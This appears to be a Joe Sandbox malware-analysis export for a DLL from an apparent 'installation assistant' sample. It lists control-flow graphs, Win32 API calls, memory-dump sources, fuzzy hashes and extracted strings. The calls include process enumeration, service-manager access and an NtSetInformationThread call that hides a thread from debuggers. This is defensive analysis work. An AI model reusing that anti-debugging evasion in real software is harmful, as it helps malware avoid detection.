                                        • API ID: _strlen
                                        • String ID: HR^
                                        • API String ID: 4218353326-1341859651
                                        • Opcode ID: 7f32b0540f236de8a72514c8ca1ec0e7bf438b9c40d4a2f3bd2f25b079dff5f2
                                        • Instruction ID: a550441718cfb87c51aa5a970dfe560c04025fd25b7918ac8daf872d3c3d70be
                                        • Opcode Fuzzy Hash: 7f32b0540f236de8a72514c8ca1ec0e7bf438b9c40d4a2f3bd2f25b079dff5f2
                                        • Instruction Fuzzy Hash: 21741671645B828FC728CF28C8D0695B7F3EF95318B1D8A2DC0A68BB55E774B54ACB40

                                        Control-flow Graph
                                        control_flow_graph 4635 6ccf98b0-6ccf98c2 4636 6ccf98c6-6ccf98f3 FindFirstFileA 4635->4636 4637 6ccf98c4 4635->4637 4638 6ccf991c-6ccf9925 4636->4638 4637->4636 4639 6ccf9927-6ccf992c 4638->4639 4640 6ccf9940-6ccf9945 4638->4640 4641 6ccf992e-6ccf9933 4639->4641 4642 6ccf9900-6ccf991a 4639->4642 4643 6ccf9959-6ccf995e 4640->4643 4644 6ccf9947 4640->4644 4641->4638 4645 6ccf9935-6ccf9939 4641->4645 4642->4638 4643->4638 4647 6ccf9960-6ccf996c 4643->4647 4646 6ccf9949-6ccf9957 FindClose 4644->4646 4645->4646 4646->4638
                                        APIs
                                        • FindFirstFileA.KERNEL32(?,?), ref: 6CCF98CC
                                        • FindClose.KERNEL32(000000FF), ref: 6CCF9949
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID: gF:E$hF:E$hF:E
                                        • API String ID: 2295610775-4234190611
                                        • Opcode ID: 07efdb5030e27c4df233a884afca6ae3994e10c7e0b4e184f7b11d53c9f5b5c8
                                        • Instruction ID: a8bbeff124723ccd01b65f971bb429fd44d0c2dfe57ecfe39db09f666c204023
                                        • Opcode Fuzzy Hash: 07efdb5030e27c4df233a884afca6ae3994e10c7e0b4e184f7b11d53c9f5b5c8
                                        • Instruction Fuzzy Hash: 08115B745093819FCB548F28D444A4ABBF0BF85314F568A49E4A8C76A1E330CE89CB42

                                        Control-flow Graph
                                        control_flow_graph 4774 6cd04050-6cd04085 CreateToolhelp32Snapshot 4775 6cd040c0-6cd040c9 4774->4775 4776 6cd04110-6cd04115 4775->4776 4777 6cd040cb-6cd040d0 4775->4777 4778 6cd04087-6cd040b1 call 6cd11a25 4776->4778 4779 6cd0411b-6cd04120 4776->4779 4780 6cd040d2-6cd040d7 4777->4780 4781 6cd04148-6cd0414d 4777->4781 4778->4775 4784 6cd04122-6cd04127 4779->4784 4785 6cd04195-6cd041a2 Process32NextW 4779->4785 4782 6cd040dd-6cd040e2 4780->4782 4783 6cd0417f-6cd04190 4780->4783 4786 6cd041bc-6cd041c1 4781->4786 4787 6cd0414f-6cd0417d call 6cd0a740 Process32FirstW 4781->4787 4782->4775 4789 6cd040e4-6cd040ff CloseHandle 4782->4789 4783->4775 4784->4775 4790 6cd04129-6cd04143 4784->4790 4792 6cd041a7-6cd041b7 4785->4792 4786->4775 4794 6cd041c7-6cd041d5 4786->4794 4787->4792 4789->4775 4790->4775 4792->4775
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6CD0405E
                                        • CloseHandle.KERNEL32(?), ref: 6CD040EC
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: CloseCreateHandleSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 3280610774-0
                                        • Opcode ID: 312b251a9cffcd12785069824ae46ab94be43598ca1b7d9efb146461f6c595a3
                                        • Instruction ID: 3bb7685997ff0c7dd791d69c4a825a7433f91809a759f4418e9425462abebf34
                                        • Opcode Fuzzy Hash: 312b251a9cffcd12785069824ae46ab94be43598ca1b7d9efb146461f6c595a3
                                        • Instruction Fuzzy Hash: 38313770648340EFD710DF68D988B4ABBE4EBA9318F104A2EE5A8D77A1D335D8549B43

                                        Control-flow Graph
                                        control_flow_graph 4918 6cb83886-6cb8388e 4919 6cb83970-6cb8397d 4918->4919 4920 6cb83894-6cb83896 4918->4920 4921 6cb8397f-6cb83989 4919->4921 4922 6cb839f1-6cb839f8 4919->4922 4920->4919 4923 6cb8389c-6cb838b9 4920->4923 4921->4923 4925 6cb8398f-6cb83994 4921->4925 4926 6cb839fe-6cb83a03 4922->4926 4927 6cb83ab5-6cb83aba 4922->4927 4924 6cb838c0-6cb838c1 4923->4924 4928 6cb8395e 4924->4928 4930 6cb8399a-6cb8399f 4925->4930 4931 6cb83b16-6cb83b18 4925->4931 4932 6cb83a09-6cb83a2f 4926->4932 4933 6cb838d2-6cb838d4 4926->4933 4927->4923 4929 6cb83ac0-6cb83ac7 4927->4929 4935 6cb83960-6cb83964 4928->4935 4929->4924 4936 6cb83acd-6cb83ad6 4929->4936 4937 6cb8383b-6cb83855 call 6ccd18a0 call 6ccd18b0 4930->4937 4938 6cb839a5-6cb839bf 4930->4938 4931->4924 4939 6cb838f8-6cb83955 4932->4939 4940 6cb83a35-6cb83a3a 4932->4940 4934 6cb83957-6cb8395c 4933->4934 4934->4928 4944 6cb8396a 4935->4944 4945 6cb83860-6cb83885 4935->4945 4936->4931 4946 6cb83ad8-6cb83aeb 4936->4946 4937->4945 4947 6cb83a5a-6cb83a5d 4938->4947 4939->4934 4941 6cb83b1d-6cb83b22 4940->4941 4942 6cb83a40-6cb83a57 4940->4942 4953 6cb83b49-6cb83b50 4941->4953 4954 6cb83b24-6cb83b44 4941->4954 4942->4947 4950 6cb83ba1-6cb83bb6 4944->4950 4945->4918 4946->4939 4951 6cb83af1-6cb83af8 4946->4951 4948 6cb83aa9-6cb83ab0 4947->4948 4948->4935 4955 6cb83bc0-6cb83bda call 6ccd18a0 call 6ccd18b0 4950->4955 4957 6cb83afa-6cb83aff 4951->4957 4958 6cb83b62-6cb83b85 4951->4958 4953->4924 4961 6cb83b56-6cb83b5d 4953->4961 4954->4948 4969 6cb83be0-6cb83bfe 4955->4969 4957->4934 4958->4939 4962 6cb83b8b 4958->4962 4961->4935 4962->4950 4972 6cb83e7b 4969->4972 4973 6cb83c04-6cb83c11 4969->4973 4974 6cb83e81-6cb83ee0 call 6cb83750 GetCurrentThread NtSetInformationThread 4972->4974 4975 6cb83ce0-6cb83cea 4973->4975 4976 6cb83c17-6cb83c20 4973->4976 4993 6cb83eea-6cb83f04 call 6ccd18a0 call 6ccd18b0 4974->4993 4977 6cb83d3a-6cb83d3c 4975->4977 4978 6cb83cec-6cb83d0c 4975->4978 4980 6cb83dc5 4976->4980 4981 6cb83c26-6cb83c2d 4976->4981 4983 6cb83d3e-6cb83d45 4977->4983 4984 6cb83d70-6cb83d8d 4977->4984 4982 6cb83d90-6cb83d95 4978->4982 4986 6cb83dc6 4980->4986 4987 6cb83dc3 4981->4987 4988 6cb83c33-6cb83c3a 4981->4988 4990 6cb83dba-6cb83dc1 4982->4990 4991 6cb83d97-6cb83db8 4982->4991 4989 6cb83d50-6cb83d57 4983->4989 4984->4982 4992 6cb83dc8-6cb83dcc 4986->4992 4987->4980 4994 6cb83c40-6cb83c5b 4988->4994 4995 6cb83e26-6cb83e2b 4988->4995 4989->4986 4990->4987 5000 6cb83dd7-6cb83ddc 4990->5000 4991->4980 4992->4969 4999 6cb83dd2 4992->4999 5012 6cb83f75-6cb83fa1 4993->5012 4996 6cb83e1b-6cb83e24 4994->4996 4997 6cb83c7b-6cb83cd0 4995->4997 4998 6cb83e31 4995->4998 4996->4992 5003 6cb83e76-6cb83e79 4996->5003 4997->4989 4998->4955 4999->5003 5004 6cb83dde-6cb83e17 5000->5004 5005 6cb83e36-6cb83e3d 5000->5005 5003->4974 5004->4996 5007 6cb83e5c-6cb83e5f 5005->5007 5008 6cb83e3f-6cb83e5a 5005->5008 5007->4997 5011 6cb83e65-6cb83e69 5007->5011 5008->4996 5011->4992 5011->5003 5016 6cb84020-6cb84026 5012->5016 5017 6cb83fa3-6cb83fa8 5012->5017 5020 6cb8402c-6cb8403c 5016->5020 5021 6cb83f06-6cb83f35 5016->5021 5018 6cb8407c-6cb84081 5017->5018 5019 6cb83fae-6cb83fcf 5017->5019 5022 6cb840aa-6cb840ae 5018->5022 5023 6cb84083-6cb8408a 5018->5023 5019->5022 5025 6cb8403e-6cb84058 5020->5025 5026 6cb840b3-6cb840b8 5020->5026 5024 6cb83f38-6cb83f61 5021->5024 5030 6cb83f6b-6cb83f6f 5022->5030 5023->5024 5027 6cb84090 5023->5027 5029 6cb83f64-6cb83f67 5024->5029 5031 6cb8405a-6cb84063 5025->5031 5026->5019 5028 6cb840be-6cb840c9 5026->5028 5027->4993 5032 6cb840a7 5027->5032 5028->5022 5033 6cb840cb-6cb840d4 5028->5033 5034 6cb83f69 5029->5034 5030->5012 5035 6cb84069-6cb8406c 5031->5035 5036 6cb840f5-6cb8413f 5031->5036 5032->5022 5033->5032 5037 6cb840d6-6cb840f0 5033->5037 5034->5030 5039 6cb84072-6cb84077 5035->5039 5040 6cb84144-6cb8414b 5035->5040 5036->5034 5037->5031 5039->5029 5040->5030
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ab6c0be5bc3c17e12b5440386461202f81f427f8a12bf32e48db7d6f7864ce80
                                        • Instruction ID: 7f3a66f75f581e4be8ec6203c56270a475185442d9364799f269fc9fdc62bcd6
                                        • Opcode Fuzzy Hash: ab6c0be5bc3c17e12b5440386461202f81f427f8a12bf32e48db7d6f7864ce80
                                        • Instruction Fuzzy Hash: 8532F732246B818FC324CF28C8D0696B7E3EFD131476A8A6CC0EA5BB55D775B44ACB51
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: CurrentThread
                                        • String ID:
                                        • API String ID: 2882836952-0
                                        • Opcode ID: 8a4bc708c74b00e8473ed24c757d6d6906bf311512d3263109aace7e1cef07ae
                                        • Instruction ID: 41ddbbaffb2d52aae4e5cb0a3a7b8def30628b076a21ba25a71f41fe09144620
                                        • Opcode Fuzzy Hash: 8a4bc708c74b00e8473ed24c757d6d6906bf311512d3263109aace7e1cef07ae
                                        • Instruction Fuzzy Hash: E65102315467818FC320CF28C8907D6B7E3BF95314F6A8A5DC0E61BA91EB75B44ACB91
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: CurrentThread
                                        • String ID:
                                        • API String ID: 2882836952-0
                                        • Opcode ID: 6cb4472c857973275b9d01e97cf7cb56491d5f7f6d51111227d68a25e3f4be90
                                        • Instruction ID: f755a09ef0c52b731ea9b4605b5288dc260acae8632a1eb9b2aab49b70e27eec
                                        • Opcode Fuzzy Hash: 6cb4472c857973275b9d01e97cf7cb56491d5f7f6d51111227d68a25e3f4be90
                                        • Instruction Fuzzy Hash: C251E4315067818FC320CF28C490795B7E3BF95314F698B1DC0E65BA95EB75B446CB91
                                        APIs
                                        • GetCurrentThread.KERNEL32 ref: 6CB83E9D
                                        • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CB83EAA
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: Thread$CurrentInformation
                                        • String ID:
                                        • API String ID: 1650627709-0
                                        • Opcode ID: e44ce10f176b8ba8fc57d5928b6e95e3a9cfb236138c1ba698ec4fc83862f389
                                        • Instruction ID: d18b27a5017b31a47d0feefddc53a80a64f41b5e11371bf5ac2f5d7c24481f79
                                        • Opcode Fuzzy Hash: e44ce10f176b8ba8fc57d5928b6e95e3a9cfb236138c1ba698ec4fc83862f389
                                        • Instruction Fuzzy Hash: DE312431646B81CFC720CF28C8947C6B7B7AF95314F2A4A1DC0A65BA80EB79B009DB51
                                        APIs
                                        • GetCurrentThread.KERNEL32 ref: 6CB83E9D
                                        • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CB83EAA
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: Thread$CurrentInformation
                                        • String ID:
                                        • API String ID: 1650627709-0
                                        • Opcode ID: dfa57eec48cae62a4fbb3794a3f6af5c372930426b5c9c75a22176b35f8556e1
                                        • Instruction ID: ab35430f9fc86ffd59ef3c41ee7c7716d9f7a0525650ec342e35f8974679f362
                                        • Opcode Fuzzy Hash: dfa57eec48cae62a4fbb3794a3f6af5c372930426b5c9c75a22176b35f8556e1
                                        • Instruction Fuzzy Hash: EA312331106781CFC720CF28C4A0796B7F6AF91304F294A1CC0A65BA81EB71B445CB92
                                        APIs
                                        • GetCurrentThread.KERNEL32 ref: 6CB83E9D
                                        • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CB83EAA
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: Thread$CurrentInformation
                                        • String ID:
                                        • API String ID: 1650627709-0
                                        • Opcode ID: f05b6709f02e0e46cf0042bfaf8ad45a7927788d72256cab14e149eb8f829801
                                        • Instruction ID: 955d531381050616bfa262f590c8c018415d4dfb8591a47dad4ca88f279a0749
                                        • Opcode Fuzzy Hash: f05b6709f02e0e46cf0042bfaf8ad45a7927788d72256cab14e149eb8f829801
                                        • Instruction Fuzzy Hash: C921383011A781CFD724CF24C8A479677B6AF52304F154A1DC0A64BA80EB75B004CB92
                                        APIs
                                        • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6CD03F40
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ManagerOpen
                                        • String ID:
                                        • API String ID: 1889721586-0
                                        • Opcode ID: a97e233bbaf818811dae27631201be7f802020c68ea4aa11fee9398dcaecefb1
                                        • Instruction ID: 8f37876526a3016d860a86eeb37788e2e051742f26043330273b00c6d46ffa44
                                        • Opcode Fuzzy Hash: a97e233bbaf818811dae27631201be7f802020c68ea4aa11fee9398dcaecefb1
                                        • Instruction Fuzzy Hash: 7B312874608342AFC700CF29C888A1ABFF1AF99754F14885EF498C7262C775D844DBA3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: "OP$#OP$#OP$+duH$+duH$/+p8$/+p8$H$J\$J\$P$Rr!A$Sr!A$Sr!A$p
                                        • API String ID: 0-2001680094
                                        • Opcode ID: 8d4b640db0d403a7c4fb8037565728003368f4e5b7f024a779270e16d5c7fde5
                                        • Instruction ID: 69feee49134dd4d6079f1390a90a119eaccdf6565626b557b3aa930877e10dee
                                        • Opcode Fuzzy Hash: 8d4b640db0d403a7c4fb8037565728003368f4e5b7f024a779270e16d5c7fde5
                                        • Instruction Fuzzy Hash: 0CA29BB460D3818FC724CF19C49066ABBE2ABD9318F298D1EF698C7751E634E446CB53

                                        Control-flow Graph
                                        control_flow_graph 3914 6cd1b8f3-6cd1b903 3915 6cd1b905-6cd1b918 call 6cd0e7ff call 6cd0e7ec 3914->3915 3916 6cd1b91d-6cd1b91f 3914->3916 3932 6cd1bc9c 3915->3932 3918 6cd1b925-6cd1b92b 3916->3918 3919 6cd1bc84-6cd1bc91 call 6cd0e7ff call 6cd0e7ec 3916->3919 3918->3919 3922 6cd1b931-6cd1b957 3918->3922 3937 6cd1bc97 call 6cd0ef40 3919->3937 3922->3919 3925 6cd1b95d-6cd1b966 3922->3925 3928 6cd1b980-6cd1b982 3925->3928 3929 6cd1b968-6cd1b97b call 6cd0e7ff call 6cd0e7ec 3925->3929 3930 6cd1bc80-6cd1bc82 3928->3930 3931 6cd1b988-6cd1b98b 3928->3931 3929->3937 3936 6cd1bc9f-6cd1bca2 3930->3936 3931->3930 3935 6cd1b991-6cd1b995 3931->3935 3932->3936 3935->3929 3939 6cd1b997-6cd1b9ae 3935->3939 3937->3932 3942 6cd1b9b0-6cd1b9b3 3939->3942 3943 6cd1b9ff-6cd1ba05 3939->3943 3947 6cd1b9c3-6cd1b9c9 3942->3947 3948 6cd1b9b5-6cd1b9be 3942->3948 3945 6cd1ba07-6cd1ba11 3943->3945 3946 6cd1b9cb-6cd1b9e2 call 6cd0e7ff call 6cd0e7ec call 6cd0ef40 3943->3946 3949 6cd1ba13-6cd1ba15 3945->3949 3950 6cd1ba18-6cd1ba36 call 6cd13615 call 6cd135db * 2 3945->3950 3981 6cd1bbb7 3946->3981 3947->3946 3952 6cd1b9e7-6cd1b9fa 3947->3952 3951 6cd1ba83-6cd1ba93 3948->3951 3949->3950 3985 6cd1ba53-6cd1ba7c call 6cd19a89 3950->3985 3986 6cd1ba38-6cd1ba4e call 6cd0e7ec call 6cd0e7ff 3950->3986 3954 6cd1ba99-6cd1baa5 3951->3954 3955 6cd1bb58-6cd1bb61 call 6cd20805 3951->3955 3952->3951 3954->3955 3958 6cd1baab-6cd1baad 3954->3958 3969 6cd1bb63-6cd1bb75 3955->3969 3970 6cd1bbd4 3955->3970 3958->3955 3962 6cd1bab3-6cd1bad7 3958->3962 3962->3955 3966 6cd1bad9-6cd1baef 3962->3966 3966->3955 3971 6cd1baf1-6cd1baf3 3966->3971 3969->3970 3975 6cd1bb77-6cd1bb86 GetConsoleMode 3969->3975 3973 6cd1bbd8-6cd1bbf0 ReadFile 3970->3973 3971->3955 3977 6cd1baf5-6cd1bb1b 3971->3977 3979 6cd1bbf2-6cd1bbf8 3973->3979 3980 6cd1bc4c-6cd1bc57 GetLastError 3973->3980 3975->3970 3976 6cd1bb88-6cd1bb8c 3975->3976 3976->3973 3982 6cd1bb8e-6cd1bba8 ReadConsoleW 3976->3982 3977->3955 3984 6cd1bb1d-6cd1bb33 3977->3984 3979->3980 3989 6cd1bbfa 3979->3989 3987 6cd1bc70-6cd1bc73 3980->3987 3988 6cd1bc59-6cd1bc6b call 6cd0e7ec call 6cd0e7ff 3980->3988 3983 6cd1bbba-6cd1bbc4 call 6cd135db 3981->3983 3990 6cd1bbc9-6cd1bbd2 3982->3990 3991 6cd1bbaa GetLastError 3982->3991 3983->3936 3984->3955 3995 6cd1bb35-6cd1bb37 3984->3995 3985->3951 3986->3981 3992 6cd1bbb0-6cd1bbb6 call 6cd0e812 3987->3992 3993 6cd1bc79-6cd1bc7b 3987->3993 3988->3981 3999 6cd1bbfd-6cd1bc0f 3989->3999 3990->3999 3991->3992 3992->3981 3993->3983 3995->3955 4004 6cd1bb39-6cd1bb53 3995->4004 3999->3983 4001 6cd1bc11-6cd1bc15 3999->4001 4008 6cd1bc17-6cd1bc27 call 6cd1bd1e 4001->4008 4009 6cd1bc2e-6cd1bc39 4001->4009 4004->3955 4020 6cd1bc2a-6cd1bc2c 4008->4020 4014 6cd1bc45-6cd1bc4a call 6cd1bfd6 4009->4014 4015 6cd1bc3b call 6cd1bca3 4009->4015 4021 6cd1bc40-6cd1bc43 4014->4021 4015->4021 4020->3983 4021->4020
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 8Q
                                        • API String ID: 0-4022487301
                                        • Opcode ID: fc74c7aacf0783fd0dc7fc412b8e09cd7bf6c4e104bd1ee89eb605b978a84104
                                        • Instruction ID: 126f4bfd330ed55a7e406cf38fedc39a73f32de5bbbd9d6532825ae8acab1c73
                                        • Opcode Fuzzy Hash: fc74c7aacf0783fd0dc7fc412b8e09cd7bf6c4e104bd1ee89eb605b978a84104
                                        • Instruction Fuzzy Hash: FBC1F8B0B08245EFDF05CFA9D880BADBBB1AF4A318F104159E55497FE1CB359A05CBA1

                                        Control-flow Graph

                                        • Control-flow graph of the function at 6CD22E8C (the rendered graph is not preserved in this export). Win32 calls in its blocks: GetFileType, GetLastError (three error paths), CloseHandle (two blocks). Internal callees: 6CD2330C, 6CD2042C, 6CD0E7FF, 6CD0E7EC, 6CD23277 (the subcall containing CreateFileW, per the APIs list below), 6CD0E812, 6CD205D0, 6CD23530, 6CD23486, 6CD1A745, 6CD2053F.
                                        APIs
                                          • Part of subcall function 6CD23277: CreateFileW.KERNEL32(00000000,00000000,?,6CD22F35,?,?,00000000,?,6CD22F35,00000000,0000000C), ref: 6CD23294
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CD22FA0
                                        • __dosmaperr.LIBCMT ref: 6CD22FA7
